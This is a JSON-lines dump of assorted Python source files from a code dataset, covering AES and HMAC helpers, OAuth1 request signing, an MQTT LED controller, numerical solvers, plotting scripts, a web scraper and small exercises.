+{"seq_id":"502436843","text":"# Python imports\r\nimport hashlib\r\nimport hmac\r\nimport os\r\n\r\n# Third-party imports\r\nfrom Crypto.Cipher import AES\r\n\r\n\r\ndef hash_string(\r\n k: bytes,\r\n e: str,\r\n) -> bytes:\r\n \"\"\"Hash a string using SHA-256.\r\n\r\n :param k: Hash key\r\n :type k: bytes\r\n :param e: Hash input\r\n :type e: str\r\n :returns: The SHA-256 hash of the input string\r\n :rtype: bytes\r\n \"\"\"\r\n return hmac.new(k, e.encode('utf-8'), hashlib.sha256).digest()\r\n\r\n\r\ndef hash_int(\r\n k: bytes,\r\n e: int,\r\n) -> bytes:\r\n \"\"\"Hash an integer using SHA-256.\r\n\r\n :param k: Hash key\r\n :type k: bytes\r\n :param e: Hash input\r\n :type e: int\r\n :returns: The SHA-256 hash of the input integer\r\n :rtype: bytes\r\n \"\"\"\r\n return hash_string(k, str(e))\r\n\r\n\r\ndef hash_bytes(\r\n k: bytes,\r\n e: bytes,\r\n) -> bytes:\r\n \"\"\"Hash bytes using SHA-256.\r\n\r\n :param k: Hash key\r\n :type k: bytes\r\n :param e: Hash input\r\n :type e: bytes\r\n :returns: The SHA-256 hash of the input bytes\r\n :rtype: bytes\r\n \"\"\"\r\n return hmac.new(k, e, hashlib.sha256).digest()\r\n\r\n\r\ndef hash_string_to_int(\r\n k: bytes,\r\n e: str,\r\n) -> int:\r\n \"\"\"Hash a string using SHA-256 and convert the result to an integer.\r\n\r\n :param k: Hash key\r\n :type k: bytes\r\n :param e: Hash input\r\n :type e: str\r\n :returns: An integer representation of the SHA-256 hash of the input string\r\n :rtype: int\r\n \"\"\"\r\n return int.from_bytes(hash_string(k, e), 'big')\r\n\r\n\r\ndef encrypt(\r\n key: bytes,\r\n plain_text: str,\r\n) -> bytes:\r\n \"\"\"Encrypts data using AES in CBC mode.\r\n\r\n :param key: The encryption key\r\n :type key: bytes\r\n :param plain_text: The data to encrypt\r\n :type plain_text: str\r\n :returns: The encryption of the raw data\r\n :rtype: bytes\r\n \"\"\"\r\n block_size = 16\r\n plain_text = _pad(plain_text, block_size)\r\n iv = os.urandom(block_size)\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n cipher_text = cipher.encrypt(plain_text.encode())\r\n return iv + cipher_text\r\n\r\n\r\ndef decrypt(\r\n key: bytes,\r\n cipher_text: bytes,\r\n) -> str:\r\n \"\"\"Decrypts cipher text using AES in CBC mode.\r\n\r\n :param key: The decryption key\r\n :type key: bytes\r\n :param cipher_text: The cipher text to decrypt\r\n :type cipher_text: bytes\r\n :returns: The decryption of the cipher text\r\n :rtype: str\r\n \"\"\"\r\n block_size = 16\r\n iv = cipher_text[:block_size]\r\n cipher = AES.new(key, AES.MODE_CBC, iv)\r\n plain_text = cipher.decrypt(cipher_text[block_size:]).decode('utf-8')\r\n return _unpad(plain_text)\r\n\r\n\r\ndef _pad(\r\n s: str,\r\n bs: int,\r\n) -> str:\r\n \"\"\"Pads a string so its length is a multiple of a specified block size.\r\n\r\n :param s: The string that is to be padded\r\n :type s: str\r\n :param bs: The block size\r\n :type bs: int\r\n :returns: The initial string, padded to have a length that is a multiple of the specified block size\r\n :rtype: str\r\n \"\"\"\r\n number_of_bytes_to_pad = bs - len(s) % bs\r\n ascii_string = chr(number_of_bytes_to_pad)\r\n padding_str = number_of_bytes_to_pad * ascii_string\r\n return s + padding_str\r\n\r\n\r\ndef _unpad(\r\n s: str,\r\n) -> str:\r\n \"\"\"Unpads a string that was previously padded by _pad().\r\n\r\n :param s: The string to unpad\r\n :type s: bytes\r\n :returns: The unpadded string\r\n :rtype: str\r\n \"\"\"\r\n last_character = s[len(s) - 1:]\r\n bytes_to_remove = ord(last_character)\r\n return 
s[:-bytes_to_remove]\r\n","sub_path":"src/crypto.py","file_name":"crypto.py","file_ext":"py","file_size_in_byte":3520,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
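A round-trip sanity check for the record's `encrypt`/`decrypt` pair. AES takes a 16-, 24-, or 32-byte key; the snippet assumes the two helpers above are importable (the `crypto` import path mirrors the record's `src/crypto.py` and is an assumption):

    import os
    from crypto import encrypt, decrypt  # assumed import path for the module above

    key = os.urandom(32)                 # AES-256 key
    blob = encrypt(key, "attack at dawn")
    assert decrypt(key, blob) == "attack at dawn"
    print(len(blob))  # 32: a 16-byte random IV plus one padded 16-byte block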
+{"seq_id":"391137434","text":"import numpy as np\nfrom tkinter_gui_builder.canvas_image_objects.abstract_canvas_image import AbstractCanvasImage\n\n\nclass NumpyCanvasDisplayImage(AbstractCanvasImage):\n\n def __init__(self):\n self.numpy_data = None # type: np.ndarray\n\n def init_from_fname_and_canvas_size(self,\n numpy_data, # type: np.ndarray\n canvas_ny, # type: int\n canvas_nx, # type: int\n scale_to_fit_canvas=True, # type: bool\n ):\n print(\"This is a special case of image object. use 'init_from_numpy_array_and_canvas_size' instead.\")\n pass\n\n def init_from_numpy_array_and_canvas_size(self, numpy_data, canvas_ny, canvas_nx):\n self.numpy_data = numpy_data\n numpy_dims = np.shape(numpy_data)\n self.full_image_nx = numpy_dims[1]\n self.full_image_ny = numpy_dims[0]\n self.canvas_nx = canvas_nx\n self.canvas_ny = canvas_ny\n self.update_canvas_display_image_from_full_image()\n\n def get_decimated_image_data_in_full_image_rect(self,\n full_image_rect, # type: (int, int, int, int)\n decimation, # type: int\n ):\n if decimation < 1:\n decimation = 1\n y1, x1, y2, x2 = int(full_image_rect[0]), int(full_image_rect[1]), int(full_image_rect[2]), int(full_image_rect[3])\n rect_data = self.numpy_data[y1:y2:decimation, x1:x2:decimation]\n return rect_data\n","sub_path":"tkinter_gui_builder/canvas_image_objects/numpy_canvas_image.py","file_name":"numpy_canvas_image.py","file_ext":"py","file_size_in_byte":1699,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"385284124","text":"# Import relevant modules\nimport numpy as np\n\n# Define constants\nu, L, H, rho, alph, n = 12, 1, 0.2, 1, 5, 4\n# Boundary conditions\nTA, TC, TD = 20, 100, 50\n\n# Calculate parameters\ndelx = L/2\ndely = H/2\nFx = rho*u\nDx = alph/delx\nDy = alph/dely\nAx = dely\nAy = delx\n\n# Create solution matrix\na = np.zeros((n, n))\nSu = np.zeros((n, 1))\n\n# Manually input solution to create matrix\n# node 1 (recall python start at 0)\nSu[0] = ((2*Dx+Fx)*Ax)*TA+(2*Dy*Ay)*TC\na[0, 1] = (Fx / 2 - Dx) * Ax\na[0, 2] = -Dy * Ay\na[0, 0] = (3 * Dx + Fx / 2) * Ax + (3 * Dy * Ay)\n\n# node 2\nSu[1] = (2*Dy*Ay)*TC\na[1, 0] = -(Dx + Fx / 2) * Ax\na[1, 3] = -Dy * Ay\na[1, 1] = (Dx + Fx / 2) * Ax + (3 * Dy * Ay)\n\n# node 3\nSu[2] = ((2*Dx+Fx)*Ax)*TA+2*Dy*Ay*TD\na[2, 0] = -Dy * Ay\na[2, 3] = -(Dx - Fx / 2) * Ax\na[2, 2] = (3 * Dx + Fx / 2) * Ax + (3 * Dy * Ay)\n\n# node 4\nSu[3] = (2*Dy*Ay)*TD\na[3, 1] = -Dy * Ay\na[3, 2] = -(Dx + Fx / 2) * Ax\na[3, 3] = (Dx + Fx / 2) * Ax + (3 * Dy * Ay)\n\n\n# Initialize solutions\nrelax, Nmax = 1.1, 3\nTj = np.zeros((n, Nmax))\nTgs = np.zeros((n, Nmax))\nTrlx = np.zeros((n, Nmax))\nSumj = np.zeros((n, Nmax))\nSumgs1 = np.zeros((n, Nmax))\nSumgs2 = np.zeros((n, Nmax))\n\n# Cycle through iterations k\nfor k in range(1, Nmax):\n # Cycle through matrix i,j\n for i in range(0, n):\n for j in range(0, n):\n # JM\n if j != i:\n Sumj[i, k] += -a[i, j] * Tj[j, k - 1]\n Tj[i, k] = (1 / a[i, i]) * (Sumj[i, k] + Su[i])\n # GSM\n if j <= i-1:\n Sumgs1[i, k] += -a[i, j] * Tgs[j, k]\n if j >= i+1:\n Sumgs2[i, k] += -a[i, j] * Tgs[j, k - 1]\n Tgs[i, k] = (1 / a[i, i]) * (Sumgs1[i, k] + Sumgs2[i, k] + Su[i])\n\n # RM\n Trlx[i, k] = relax*Tgs[i, k] + (1-relax)*Trlx[i, k-1]\n\n# Get exact solution\nTex = Tgs[:, Nmax-1]\n\n# Compute errors\nerr = np.zeros((3, 1))\nitnum = 3\nfor e in range(0, n):\n # Error for JM\n err[0] += abs(Tj[e, itnum] - Tex[e])\n # Error for GSM\n err[1] += abs(Tgs[e, itnum] - Tex[e])\n # Error for RLM\n err[2] += abs(Trlx[e, itnum] - Tex[e])\n\n# Export Results\nnp.savetxt('Results\\Tj.csv', Tj[:, 1:itnum+1], delimiter=',')\nnp.savetxt('Results\\Tgs.csv', Tgs[:, 1:itnum+1], delimiter=',')\nnp.savetxt('Results\\Trlx.csv', Trlx[:, 1:itnum+1], delimiter=',')\nnp.savetxt('Results\\err.csv', err[:, 1:itnum+1], delimiter=',')\n","sub_path":"A3/Python/Main.py","file_name":"Main.py","file_ext":"py","file_size_in_byte":2363,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"318445051","text":"# Summation of primes\n\n# The sum of the primes below 10 is 2 + 3 + 5 + 7 = 17.\n# Find the sum of all the primes below two million.\n\n\ndef isPrime(number):\n\n\tif number == 2: return True\n\tif number > 2 and number % 2 == 0: return False\n\n\troot = int(number ** 0.5)\n\n\tfor i in range (3, root+1):\n\t\tif number % i == 0:\n\t\t\treturn False\n\n\treturn True\t\n\t\t\nresult = 0\n\nfor i in range(2, 2000000):\n\tif isPrime(i):\n\t\tresult += i\n\nprint(result)","sub_path":"Problems/010/010 Summation of Primes.py","file_name":"010 Summation of Primes.py","file_ext":"py","file_size_in_byte":431,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"601232048","text":"import time\nfrom uuid import uuid4\n\nfrom requests.auth import AuthBase\nfrom OpenSSL.crypto import PKey\nfrom OpenSSL import crypto\nfrom requests import PreparedRequest\nimport hashlib\nfrom . import coreutils as util\n\nHASH_SHA1 = 'SHA1'\nHASH_SHA256 = 'SHA256'\n\n\ndef hash_func(hash_alg):\n return {\n HASH_SHA1: hashlib.sha1,\n HASH_SHA256: hashlib.sha256\n }[hash_alg]\n\n\nclass OAuth1RSA(AuthBase):\n \"\"\"OAuth1 RSA-SHA1/SHA256 requests's auth helper\n\n Usage:\n >>> from oauth1 import authenticationutils\n >>> from oauth1.auth_ext import OAuth1RSA\n >>> import requests\n >>> CONSUMER_KEY = 'secret-consumer-key'\n >>> pk = authenticationutils.load_signing_key('instance/masterpass.pfx', 'a3fa02536a')\n >>> oauth = OAuth1RSA(CONSUMER_KEY, pk)\n >>> requests.post('https://endpoint.com/the/route', data={'foo': 'bar'}, auth=oauth)\n \"\"\"\n\n def __init__(self, consumer_key: str, signing_key: PKey, hash_alg=HASH_SHA1):\n self.consumer_key = consumer_key\n self.signing_key = signing_key\n self.hash_alg = hash_alg\n self.hash_f = hash_func(hash_alg)\n\n def __call__(self, r: PreparedRequest):\n payload = {\n 'oauth_version': '1.0',\n 'oauth_nonce': self.nonce(),\n 'oauth_timestamp': str(self.timestamp()),\n 'oauth_signature_method': f'RSA-{self.hash_alg}',\n 'oauth_consumer_key': self.consumer_key\n }\n\n # Google's body hash extension\n payload = self.oauth_body_hash(r, payload)\n\n signable_message = self.signable_message(r, payload)\n signature = self.signature(signable_message)\n payload['oauth_signature'] = signature\n\n h = self._generate_header(payload)\n\n r.headers['Authorization'] = h\n return r\n\n @staticmethod\n def nonce():\n return str(uuid4())\n\n @staticmethod\n def timestamp():\n return int(time.time())\n\n def _hash(self, message: str) -> str:\n return self.hash_f(message.encode('utf8')).digest()\n\n @staticmethod\n def signable_message(r: PreparedRequest, payload: dict):\n params = [\n r.method.upper(),\n util.normalize_url(r.url),\n util.normalize_params(r.url, payload)\n ]\n params = map(util.uri_rfc3986_encode, params)\n return '&'.join(params)\n\n def signature(self, message: str):\n signature = crypto.sign(self.signing_key, message, self.hash_alg)\n return util.base64_encode(signature)\n\n @staticmethod\n def _generate_header(payload: dict):\n _ = util.uri_rfc3986_encode\n pts = [f'{_(k)}=\"{_(v)}\"' for k, v in sorted(payload.items())]\n msg = ','.join(pts)\n return f'OAuth {msg}'\n\n def oauth_body_hash(self, r: PreparedRequest, payload: dict):\n if r.headers.get('content-type') == 'multipart/form-data':\n return payload\n\n body = r.body\n payload['oauth_body_hash'] = util.uri_rfc3986_encode(util.base64_encode(self._hash(body)))\n return payload\n","sub_path":"oauth1/auth_ext.py","file_name":"auth_ext.py","file_ext":"py","file_size_in_byte":3053,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"134381806","text":"#!/usr/bin/env python\n\nimport time\nimport paho.mqtt.client as mqtt\nfrom RGBlib import displayColor\nfrom neopixel import *\nimport argparse\nimport json\n\nglobal CountRGB\nglobal ColorRGB\nglobal BrightnessRGB\n\nCountRGB = 8\nColorRGB= {\"r\":5,\"g\":5,\"b\":5,\"a\":1}\nBrightnessRGB = 120\n\ndef on_connect( client, userdata, flags, rc ):\n print(\"Connected with result code \" + str(rc))\n #client.subscribe(\"Test\")\n client.subscribe(\"RGBColor\")\n client.subscribe(\"RGBCount\")\n client.subscribe(\"RGBBrightness\")\n\ndef SetLed( jsonMSG, CountLEDs, BrightnessRGB ):\n print(\"in set LED\")\n color = json.loads(jsonMSG)\n displayColor( BrightnessRGB, CountLEDs, color[\"g\"], color[\"r\"], color[\"b\"])\n #displayColor( 5, 5, 5, 5)\n\ndef on_message( client, userdata, msg ):\n global CountRGB\n global ColorRGB\n global BrightnessRGB\n #print(msg.topic + \" \" + str(msg.payload))\n if msg.topic == \"RGBCount\":\n CountRGB = msg.payload.decode()\n CountRGB = int(CountRGB)\n elif msg.topic == \"RGBColor\":\n ColorRGB = msg.payload.decode()\n else:\n BrightnessRGB = msg.payload.decode()\n BrightnessRGB = int(BrightnessRGB)\n print(BrightnessRGB)\n \n print(\"Bevor auslöser\")\n SetLed( ColorRGB, CountRGB, BrightnessRGB )\n \n\n#if __name__ == \"__main__\":\nclient = mqtt.Client()\nclient.on_connect = on_connect\nclient.on_message = on_message\n\nclient.connect(\"localhost\", 1883, 60)\n\nclient.loop_forever()\n","sub_path":"NodeRed/RGB/NODE/RGB.py","file_name":"RGB.py","file_ext":"py","file_size_in_byte":1447,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"561280195","text":"import cv2\n# from maze import Maze\nfrom maze import Maze\n\n\nmaze_image = '../img/maze.png'\n\nstart = (9,12)\nend = (213,211)\n\ntest = True\n\ntest_img = cv2.imread(maze_image)\nif test:\n maze_solver = Maze(test_img)\n maze_solver.get_shortest_path(start=start, end=end)\n\n test_img = maze_solver.get_solution_image()\n\ncv2.imshow('image',test_img)\ncv2.waitKey(0)\ncv2.destroyAllWindows()\n","sub_path":"maze_solver/test_maze.py","file_name":"test_maze.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"411656259","text":"import logging\nfrom typing import Optional, Callable, Tuple, List\n\nfrom lcs.strategies.action_selection import choose_action\nfrom ...agents import Agent\nfrom ...agents.Agent import Metric\nfrom ...agents.racs import Configuration, ClassifierList\nfrom ...utils import parse_state, parse_action\n\n\nclass RACS(Agent):\n \"\"\"ACS2 agent operating on real-valued (floating) number\"\"\"\n\n def __init__(self,\n cfg: Configuration,\n population: ClassifierList=None) -> None:\n self.cfg = cfg\n self.population = population or ClassifierList()\n\n def explore(self, env, trials) -> Tuple:\n return self._evaluate(env, trials, self._run_trial_explore)\n\n def exploit(self, env, trials):\n pass\n\n def _evaluate(self, env, max_trials: int, func: Callable) -> Tuple:\n \"\"\"\n Runs the classifier in desired strategy (see `func`) and collects\n metrics.\n\n Parameters\n ----------\n env:\n OpenAI Gym environment\n max_trials: int\n maximum number of trials\n func: Callable\n Function accepting three parameters: env, steps already made,\n current trial\n\n Returns\n -------\n tuple\n population of classifiers and metrics\n \"\"\"\n current_trial = 0\n steps = 0\n\n metrics: List = []\n while current_trial < max_trials:\n steps_in_trial = func(env, steps, current_trial)\n steps += steps_in_trial\n\n # TODO: collect metrics\n\n current_trial += 1\n\n return self.population, metrics\n\n def _run_trial_explore(self, env, time, current_trial=None):\n logging.debug(\"** Running trial explore ** \")\n # Initial conditions\n steps = 0\n raw_state = env.reset()\n state = parse_state(raw_state, self.cfg.perception_mapper_fcn)\n action = None\n reward = None\n prev_state = None\n action_set = ClassifierList()\n done = False\n\n while not done:\n match_set = self.population.form_match_set(state)\n\n if steps > 0:\n # Apply learning in the last action set\n action_set.apply_alp(\n prev_state,\n action,\n state,\n time + steps,\n self.population,\n match_set,\n self.cfg)\n action_set.apply_reinforcement_learning(\n reward,\n match_set.get_maximum_fitness())\n if self.cfg.do_ga:\n pass\n # TODO: implement GA\n\n action = choose_action(\n match_set,\n self.cfg.number_of_possible_actions,\n self.cfg.epsilon)\n internal_action = parse_action(action, self.cfg.action_mapping_fcn)\n logging.debug(\"\\tExecuting action: [%d]\", action)\n action_set = match_set.form_action_set(action)\n\n prev_state = state\n raw_state, reward, done, _ = env.step(internal_action)\n state = parse_state(raw_state, self.cfg.perception_mapper_fcn)\n\n if done:\n action_set.apply_alp(\n prev_state,\n action,\n state,\n time + steps,\n self.population,\n None,\n self.cfg)\n action_set.apply_reinforcement_learning(\n reward,\n 0)\n if self.cfg.do_ga:\n pass\n # TODO: implement GA\n steps += 1\n\n return steps\n\n def _collect_agent_metrics(self, trial, steps, total_steps) -> Metric:\n return {\n \"population\": 0\n }\n\n def _collect_environment_metrics(self, env) -> Optional[Metric]:\n return None\n\n def _collect_performance_metrics(self, env) -> Optional[Metric]:\n return None\n","sub_path":"lcs/agents/racs/RACS.py","file_name":"RACS.py","file_ext":"py","file_size_in_byte":4049,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"488107476","text":"import matplotlib.pyplot as plt\nimport numpy as np\n\nx = np.linspace(0, np.pi * 2, 100)\nplt.subplot(3, 1, 1)\nplt.plot(x, np.sin(x), 'r')\nplt.grid(True)\nplt.xlim(0, np.pi * 2)\nplt.subplot(3, 1, 2)\nplt.plot(x, np.cos(x), 'g')\nplt.grid(True)\nplt.xlim(0, np.pi * 2)\nplt.subplot(3, 1, 3)\nplt.plot(x, np.sin(x), 'r', x, np.cos(x), 'g')\nplt.grid(True)\nplt.xlim(0, np.pi * 2)\nplt.savefig(\"fig3.png\", dpi=72)\nplt.show()\n","sub_path":"Matplotlib/plot11.py","file_name":"plot11.py","file_ext":"py","file_size_in_byte":410,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"585037802","text":"# Week 10, ICA 2\nimport os\n\ndef main():\n enterData()\n displayData()\n search()\n modifyNum()\n try:\n evens = 0\n odds = 0\n inf = open('numbers.txt','r')\n for num in inf:\n num = int(num)\n if num % 2 == 0:\n evens += 1\n else:\n odds += 1\n print('The file had', evens, 'evens and', odds, 'odds')\n except IOError:\n print('File did not open')\n except ValueError as duh:\n print(duh)\n finally:\n print('Moving on...')\n\ndef enterData():\n outfile = open('nba.txt','w')\n for x in range(1,4):\n print('Enter data for player #', x, sep='')\n name = input('Name: ')\n num = input('Number: ')\n team = input('Team: ')\n outfile.write(name+'\\n')\n outfile.write(num+'\\n')\n outfile.write(team+'\\n')\n outfile.close()\n\ndef displayData():\n infile = open('nba.txt','r')\n for name in infile:\n name = name.rstrip('\\n')\n num = infile.readline().rstrip('\\n')\n team = infile.readline().rstrip('\\n')\n print(name,'wears number',num,'and plays for the',team)\n infile.close()\n\ndef search():\n found = False\n infile = open('nba.txt','r')\n # Prompt user to enter a player name\n disone = input('Enter the player name to search for: ')\n name = infile.readline().rstrip('\\n')\n while name != '' and not found:\n num = infile.readline().rstrip('\\n')\n team = infile.readline().rstrip('\\n')\n if name == disone:\n print(name, 'wears number', num, 'and plays for the', team)\n found = True\n else:\n name = infile.readline().rstrip('\\n')\n if not found:\n print(disone,'is not in the file')\n infile.close()\n\ndef modifyNum():\n found = False\n disone = input('Enter the player to search for: ')\n newnum = input('Enter the new number: ')\n infile = open('nba.txt','r')\n temp = open('temp.txt','w')\n name = infile.readline().rstrip('\\n')\n while name != '':\n num = infile.readline().rstrip('\\n')\n team = infile.readline().rstrip('\\n')\n if name == disone:\n temp.write(name + '\\n')\n temp.write(newnum + '\\n')\n temp.write(team + '\\n')\n found = True\n else:\n temp.write(name + '\\n')\n temp.write(num +'\\n')\n temp.write(team +'\\n')\n name = infile.readline().rstrip('\\n')\n infile.close()\n temp.close()\n os.remove('nba.txt')\n os.rename('temp.txt', 'nba.txt')\n if found:\n print('file has been updated')\n displayData()\n else:\n print(disone, 'is not in the file')\n\nmain() # Call main","sub_path":"ICA/Ch6P2.py","file_name":"Ch6P2.py","file_ext":"py","file_size_in_byte":2705,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"210055532","text":"from pymongo import MongoClient\nfrom bs4 import BeautifulSoup\nimport urllib.request \nimport os.path\nimport collections\nimport re\nfrom json import *\nimport urllib.error\nfrom operator import itemgetter \n\nclient = MongoClient()\nclient = MongoClient('localhost', 27017)\ndb = client.indiabix\n\nurlCollection = db.urlCollection\ndomains={'simple-interest':32,'profit-and-loss':21,'problems-on-trains':19,'problems-on-ages':22,'average':23,'permutation-and-combination':24,'h.c.f-and-l.c.m':25,'time-and-distance':31}\n_offset=[0,31,61,91]\n_pageno=[0,1,2,3]\nurllist={}\n'''\nRoot of all Domains\n'''\ndom=sorted(domains)\nfor domain in dom:\n for i in range(0,4):\n offset=_offset[i]\n pageno=_pageno[i]\n if i==0:\n temp ='http://www.knowaptitude.in/questions/dumps/aptitude/arithmetic-aptitude/'+str(domain)+'?type=latest'\n else: \n temp='http://www.knowaptitude.in/ajax/Questions/dump_fetch/30/1/'+str(offset)+'/'+str(pageno)+'/4/'+str(domains[domain])+'/-1?type=latest'\n urllist.setdefault(domain,[]).append(temp)\n'''\nGetting all Domain Links\n'''\ndomques={}\nfoption=[]\nsdomain=sorted(urllist)\nfor key in sdomain:\n i=0\n for values in urllist[key]:\n r = urllib.request.urlopen(values).read()\n soup=BeautifulSoup(r,\"lxml\")\n for ntemp in soup.findAll(\"div\",{\"class\":\"dump_question\"}):\n if i==0:\n hquestion=ntemp.get_text().replace(\"\\\\r\",\"\").replace(\"\\\\n\",\"\").replace(\"\\\\t\",\"\").replace(\"\\t\",\"\").replace(\"\\\\\",\"\")\n finalquestion=re.findall('[0-9]{1,2}\\)(.*)',hquestion)\n fquestion=finalquestion[0].lstrip()\n else:\n hquestion=ntemp.get_text().replace(\"\\\\r\",\"\").replace(\"\\\\n\",\"\").replace(\"\\\\t\",\"\").replace(\"\\t\",\"\").replace(\"\\\\\",\"\")\n finalquestion=re.findall('[0-9]??\\)(.+?) A\\.',hquestion)\n fquestion=finalquestion[0].lstrip()\n domques.setdefault(key,[]).append(fquestion)\n i=i+1\n\n\nfor key,value in domques.items():\n print(\"\\n\\n\\n domain is \",key,\"\\n questions are :\",value)\n\nfor domain in domques.keys():\n #Opening a file for each domain\n domain_file_name = \"corpus/aptitude/\"+str(domain)+\".store\"\n if os.path.isfile(domain_file_name):\n print(\"Skipping : \",domain)\n continue\n domain_file = open(domain_file_name, 'w')\n print(\"Creating Files for \",domain)\n for question_div in domques[domain]:\n domain_file.write(question)\n domain_file.write('\\n')\n domain_file.close()\n print(domain,\" is completed !\")\n\n\n","sub_path":"knowapti.py","file_name":"knowapti.py","file_ext":"py","file_size_in_byte":2531,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"517460071","text":"from cpp._apollocaffe import Tensor, ApolloNet, CppConfig, make_numpy_data_param, Blob\nimport loggers\nimport utils\nfrom time import strftime\n\ndef set_cpp_loglevel(loglevel):\n CppConfig.set_cpp_loglevel(loglevel)\n\ndef set_device(device_id=-1):\n if device_id == -1:\n device_string = \"CPU device\"\n else:\n device_string = \"GPU device %d\" % device_id\n print(\"%s - %s\" % \\\n (strftime(\"%Y-%m-%d %H:%M:%S\"), device_string))\n CppConfig.set_device(device_id)\n\ndef set_random_seed(value):\n import numpy as np\n import random\n np.random.seed(value)\n random.seed(value)\n CppConfig.set_random_seed(value)\n\ndef base_parser():\n import argparse\n parser = argparse.ArgumentParser()\n parser.add_argument('--weights', default=None, type=str)\n parser.add_argument('--gpu', default=-1, type=int)\n parser.add_argument('--loglevel', default=3, type=int)\n parser.add_argument('--start_iter', default=0, type=int)\n return parser\n\nset_cpp_loglevel(3)\n\n# Apollocaffe uses print() over the obscure python logging module\n# Disable buffering of stdout ,equivalent to export PYTHONUNBUFFERED=x\nclass Unbuffered(object):\n def __init__(self, stream):\n self.stream = stream\n def write(self, data):\n self.stream.write(data)\n self.stream.flush()\n def __getattr__(self, attr):\n return getattr(self.stream, attr)\n\nimport sys\nsys.stdout = Unbuffered(sys.stdout)\n","sub_path":"python/apollocaffe/__init__.py","file_name":"__init__.py","file_ext":"py","file_size_in_byte":1423,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"627425145","text":"import pandas as pd\nfrom sklearn.feature_selection import SelectKBest, chi2\nimport KMeansTestCluster as kmtc\nimport EMTestCluster as emtc\nfrom functions import *\n\"\"\"\n@author: vincentmarois\nThis python script applies chi2 statistical tests on the Letters dataset to retrieve only the k best features\n\"\"\"\n# import dataset\nletters = pd.read_csv('letters.csv')\n\n# separate dataset into features & labels\nX = (letters.drop('lettr', axis=1)).as_matrix()\ny = letters['lettr'].as_matrix()\n\n# instantiate DR model\nselector = SelectKBest(score_func=chi2, k=\"all\")\nX_transformed = selector.fit_transform(X, y)\n\n# consider the following ranges of clusters\nclusters = range(2, 41)\n\n# search the optimal value of k for Kmeans on the transformed dataset, while considering several metrics\n# (WSS, BSS/TSS ratio, Silhouette, V-measure)\nKMeanstester = kmtc.KMeansTestCluster(X_transformed, y, clusters=clusters, plot=False, stats=True, name=\"loans\")\n_, _, Kmeans_silhouette, Kmeans_V_measure = KMeanstester.run()\n\n# search the optimal value of k for EM on the transformed dataset, while considering several metrics\n# (log-likelihood, Bayesian Information Criterion, Silhouette, V-measure)\nEMtester = emtc.EMTestCluster(X_transformed, y, clusters=clusters, plot=False, stats=True, name=\"loans\")\n_, _, EM_silhouette, EM_V_measure = EMtester.run()\n\n# Plot the Silhouette Score & V-measure metrics on same figure to compare both algorithms\nplot_silhouette_v_measure(algorithm=\"Kmeans\", clusters=clusters, silhouette=Kmeans_silhouette, v_measure=Kmeans_V_measure)\nplot_silhouette_v_measure(algorithm=\"EM\", clusters=clusters, silhouette=EM_silhouette, v_measure=EM_V_measure)","sub_path":"CS7641/Unsupervised Learning and Dimensionality Reduction/letters-dataset/letters_SelectKBest_clustering.py","file_name":"letters_SelectKBest_clustering.py","file_ext":"py","file_size_in_byte":1652,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"318912561","text":"import _Bulm\nimport numpy as np\n\ndef compute_Bulm(Blm, L, freq, d, L1):#freq in Mhz, d in equatorial coor in meters\n if d[0] == 0 and d[1] == 0 and d[2] == 0:\n Bulm = np.zeros((L+1, 2*L+1), dtype='complex64')\n Bulm[:L1+1,:L1+1] = Blm[:,:L1+1]\n Bulm[:L1+1,-(L1+1):] = Blm[:,-(L1+1):]\n return Bulm\n else:\n return _Bulm.compute_Bulm(Blm, L, freq, d[0], d[1], d[2], L1)\n","sub_path":"build/lib.macosx-10.6-x86_64-2.7/HERA_MapMaking_VisibilitySimulation/Bulm.py","file_name":"Bulm.py","file_ext":"py","file_size_in_byte":409,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"542959612","text":"from SpriteSheet import Spritesheet\n\n\nclass Obstacle(Spritesheet):\n def __init__(self, pos, vel, image):\n self.img = image\n self.width = self.img.get_width()\n self.height = self.img.get_height()\n self.pos = pos\n self.vel = vel\n\n\n","sub_path":"Obstacle.py","file_name":"Obstacle.py","file_ext":"py","file_size_in_byte":267,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
+{"seq_id":"494136405","text":"class Solution:\n def twoSum(self, nums, target):\n if len(nums) == 0 or nums == None:\n return []\n\n hashmap = {}\n\n for i, number in enumerate(nums):\n complement = target - number\n\n i2 = hashmap.get(complement, None)\n\n if i2 is not None:\n return [i2, i]\n\n hashmap[number] = i\n\n return []\n","sub_path":"1 - Two Sum/python/twosum.py","file_name":"twosum.py","file_ext":"py","file_size_in_byte":386,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"12"}
